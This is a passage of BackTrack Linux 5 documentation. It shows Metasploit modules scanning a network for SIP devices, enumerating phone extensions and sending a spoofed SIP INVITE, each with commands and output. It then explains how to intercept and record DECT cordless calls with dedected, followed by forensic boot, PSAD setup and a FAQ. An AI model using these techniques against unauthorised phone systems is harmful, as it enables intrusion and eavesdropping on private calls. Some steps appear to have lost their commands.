RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO nobody no The destination username to probe at each host msf auxiliary(options) > set RHOSTS 192.168.1.130/24 RHOSTS => 192.168.1.130/24 msf auxiliary(options) > run [*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO' [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
msf > use scanner/sip/enumerator msf auxiliary(enumerator) > show options Module options (auxiliary/scanner/sip/enumerator): Name Current Setting Required Description ------------------ -------- ---------BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5060 no The local client port MAXEXT 9999 yes Ending extension METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER MINEXT 0 yes Starting extension PADLEN 4 yes Cero padding maximum length RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads
Example Usage:
msf auxiliary(enumerator) 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(enumerator) MINEXT => 100 msf auxiliary(enumerator) MAXEXT => 500 msf auxiliary(enumerator) PADLEN => 3 msf auxiliary(enumerator)
> set MINEXT 100 > set MAXEXT 500 > set PADLEN 3 > run
[*] Found user: 200 <sip:200@192.168.1.104> [Auth] [*] Found user: 201 <sip:201@192.168.1.104> [Auth] [*] Found user: 202 <sip:202@192.168.1.104> [Auth] [*] Found user: 203 <sip:203@192.168.1.104> [Auth] [*] Found user: 204 <sip:204@192.168.1.104> [Auth] [*] Found user: 300 <sip:300@192.168.1.104> [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Example Usage:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(sip_invite_spoof) > run [*] Sending Fake SIP Invite to: 192.168.1.104 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Closing Words
I hope youve found this document informative, please keep in mind that Backtrack Linux provides many tools and features we havent covered here. Take the time to browse the tools read the manuals and READMEs I am sure youll find the right tool for the job. Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums we would love to here your feedback ideas and experiences. http://www.backtrack-linux.org/forums/
References
http://en.wikipedia.org/wiki/Session_Initiation_Protoco l http://tools.ietf.org/html/rfc3261 http://www.hackingvoip.com/
What is DECT?
http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications
The problem?
Most vendors dont implement encryption in their devices so one can sniff it with certain hardware and software. For a previous post on the topic, check: http://www.offensivesecurity.com/backtrack/sniffing-dect-phones-the-details/
Tested on
Original Dosch&Amand Type II PCMCIA Card SIEMENS C1 DECT Phones set up in repeater mode
NOTE: This is experimental software which is not very actively supported anymore!
Installing dedected
In order to get dedected installed on BackTrack, you have the choice between: 1. Use dedected from the BackTrack 5 repositories. 2. Compile it on your own if you want to experiment.
If you did not insert your Dosch&Amand Type 2 or Type 3 or Voo:doo # PCMCIA-card do so now! Next, we load the driver:
If you need info on the usage type "help". If you live in the U.S. switch to the US/DECT 6 band via the "band" command. Let's enable someverbosity:
verb
After scanning 2-3 times through all channels disable verbosity, and stop scanning:
verb stop
callscan
Now grab your DECT handset and make a test phonecall and wait until you see the phonecall .It is also sufficient if you just get a dialing tone. You should see something like
### found new call on 00 82 31 33 73 on channel 7 RSSI 34 stop
Ignore every other phone except yours via the following command! IMPORTANT!!!
ignore 01 30 95 13 37
Now grab your DECT telephony handset and do a testcall. I recommend to call a time telling serivce that can be reached over a normal phone number. You should get something like this:
### ### ### ### ### ### ### starting autorec stopping DIP starting callscan trying to sync on 00 82 ab b0 29 got sync dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap stopping DIP
stop
File -> Import -> Audio or simply "ctrl + shift + I" . Import the files which end in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav. Play your phone call with the play button:
Hint: if you can only hear noise your phone seems to use some encoding/encryption. You can enable the repeater mode in your telephone so it disables encryption and you can test if your setup is working properly.
Clean up / Reload
If you need to reload the drivers
root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux root@bt:~# make reload
DECT protocol
If you are interested in more details of the protocol you can open the .pcap file in Wireshark:
Forensics Boot
Since BackTrack 4 and now BackTrack 5 you may have noticed that BackTrack has an option BackTrack Forensics but what exactly is that ?
For a long time now, Linux Live CDs have been very useful for forensic acquisition purposes in instances where for one reason or another you cant utilize a hardware write blocker. When configured not to automount drives, and a little bit of know how, a Linux Live CD can be a wonderful software write blocker. For a Linux live CD to be considered for this purpose however, it is of the utmost importance that the use of the live CD in no way alters any data in any manner. That's the main reason that BackTrack was rolled out in the past, BackTrack would automount available drives and utilize swap partitions where available, by doing this BackTrack could have caused all sorts of havoc, changing last mount times, altering data on disk, and so on. But since BackTrack 4 and now BackTrack 5 that's not the case anymore.
How?
So, lets have the scoop. Forensic people are often detail oriented and very conservative, so how do we know it is safe to use? Well, first off the BackTrack 5 Live CD is based off of Casper, and contains no filesystem automount scripts at all. The system initialization scripts have been altered in the forensic boot mode so that BackTrack 5 will not look for or make use of any swap partitions which are contained on the system. All those scripts have been removed from the system.
Verification:
To test this functionality, we have tested this boot mode with multiple hardware configurations. For each test, we took a before MD5 snapshot of the system disks, booted BackTrack5 in forensic boot mode, verified no file systems were mounted and swap was not in use, did a number of activities on the system, then shut the system back down and took an after MD5 snapshot. In comparing the two MD5 snapshots, in every case they were a match, demonstrating no changes on the disks has been made.
Usage:
When you utilize Backtrack for forensics purposes, be sure you dont let it go through an unattended boot. Default boot for Backtrack is standard boot mode, which will use swap partitions if they are present. There is a nice long delay however, so you will have plenty of time to select the proper boot mode. Also, please remember, this is a Linux distribution. It is highly suggested that you become familiar with Linux before use this, or any other Linux Live CD for any forensic purpose. Also, be sure to check out the additional forensic tools added to Backtrack 5. We have concentrated on the addition of imaging and triage tools, but if you find that one of your favorite utilities is not in place please let us know so we can look into having it added.
root@bt:~# cd /usr/local/src root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad2.1.7.tar.bz2 root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad2.1.7.tar.bz2.md5 root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad2.1.7.tar.bz2.asc root@bt: /usr/local/src# wget http://cipherdyne.org/public_key root@bt: /usr/local/src# md5sum -c psad-2.1.7.tar.bz2.md5 psad-2.1.7.tar.bz2: OK root@bt: /usr/local/src# gpg --import public_key root@bt: /usr/local/src# gpg --verify psad-2.1.7.tar.bz2.asc #gpg: Signature made Wed 14 Jul 2010 06:01:06 PM EDT using DSA key ID 0D3E7410 #gpg: Good signature from "Michael Rash (Signing key for cipherdyne.org projects) <mbr@cipherdyne.org>"
Install PSAD:
root@bt: /usr/local/src# tar xfj psad-2.1.7.tar.bz2 root@bt: /usr/local/src# cd psad-2.1.7 root@bt: /usr/local/src/psad-2.1.7# ./install.pl # # Would you like to install the latest signatures from http://www.cipherdyne.org/psad/signatures (y/n)? y
Start PSAD:
To fix this we will need to edit psad.conf located in /etc/psad/ and add an email address as follows:
root@bt:~# cd /usr/local/src/ root@bt: /usr/local/src# mkdir gpgdir root@bt: /usr/local/src# cd gpgdir/ root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2 root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/public_key
root@bt: /usr/local/src/gpgdir# gpg --import public_key root@bt: /usr/local/src/gpgdir# gpg --verify gpgdir-1.9.5.tar.bz2.asc
Install gpgdir:
root@bt: /usr/local/src/gpgdir# tar xfj gpgdir-1.9.5.tar.bz2 root@bt: /usr/local/src/gpgdir# cd gpgdir-1.9.5 root@bt: /usr/local/src/gpgdir/gpgdir-1.9.5# ./install.pl
BackTrack Frequently Asked Questions Ive just installed BackTrack, what is the root password ?
The ubiquity installer uses the username "root" and toor password by default. We also recommend you change this as soon as you have rebooted and verified everything is working properly. You can do this by issuing the following command and following the prompts.
passwd root
Why does my keyboard stop working when I try to type the password ?
It doesn't, your keyboard is still working. When you type your password in BackTrack, nothing is shown on the screen. This is a security measure to prevent someone from "shoulder surfing" and being able to see how long your password is, thereby making it more difficult for someone who knows you to guess your password.
startx
Why cant I just add the Backtrack repositories to my Ubuntu install or the Ubuntu repositories to my Backtrack install ?
We highly recommend against this action because Backtrack tools are built with many custom features, libraries and kernel. We have no way of knowing how they will perform on a non Backtrack distribution, plus you will very quickly break your install. Also if you chose to add the ubuntu repositories to your Backtrack install, you will most certainly break your entire Backtrack install very quickly. We do a lot of testing to ensure that all packages in our repo will work together without causing problems. If you decide on this course of action you do so entirely at your own risk and the backtrack team will not offer any support in any way.
Why dont you provide a USB image like you did with previous versions ?
Previous versions required sometimes quite complicated methods to install to a USB stick, so for convenience we provided special images for easy installation. With the latest editions of BackTrack we have eliminated this need as it can easily be installed to a USB stick with tools such as Unetbootin or via manual methods as described in the Installation section of this site.
BackTrack is a highly specialized distro, where a lot of normal tasks are not done automatically for you as they are in a mainstream distro. Our best advice if you wish to start off using linux with BackTrack as your first linux operating system, is don't. Start off by downloading a copy of Kubuntu (as it is a similar base operating system to BackTrack) boot into that and force yourself to do everything you are used to doing on a daily basis using that, preferably spending most of your time using the command line tools. When and only when you can perform all of those daily tasks without having to look-up the commands should you move to BackTrack. Please don't take this as us saying you shouldn't use BackTrack, take it as friendly advice that you are letting yourself in for a whole world of pain and frustration if you are not fully comfortable performing administration of your own linux machine before you start with Backtrack.
I have just downloaded and installed the latest version of Backtrack, do i still need to update ?
Although you have downloaded the latest release of the iso or VM, this does not mean you will have the latest packages we provide. BackTrack is developed and updated on a continual basis, and for this reason you should still update your installation at regular intervals to keep yourself up to date with the latest packages, bugfixes and new tools.
When and how often do you update the BackTrack repo with new packages ?
Generally the BackTrack repo is updated with the weeks new packages late on a Sunday night so that they are available to you on Monday morning. There are times however when we feel that a package needs to be released straight away rather than waiting until the next scheduled Sunday repo update. So in these cases the repo update can happen at any time, day or night during the week. Please note that while the repo is being sync'd, it will be unavailable for downloading packages. This process doesn't take long so it will be rare for this to cause any of you more than a very short period of unavailability.
Where can I find a complete list of all the tools installed in BackTrack ?
No such resource currently exists, however you can see a list of all packages installed on your BackTrack system by running:
dpkg --list
Please remember that this will list all of the packages installed on BackTrack and not just the tools You can also search the repository for a particular package of interest by running the following command:
apt-cache search <keyword of interest>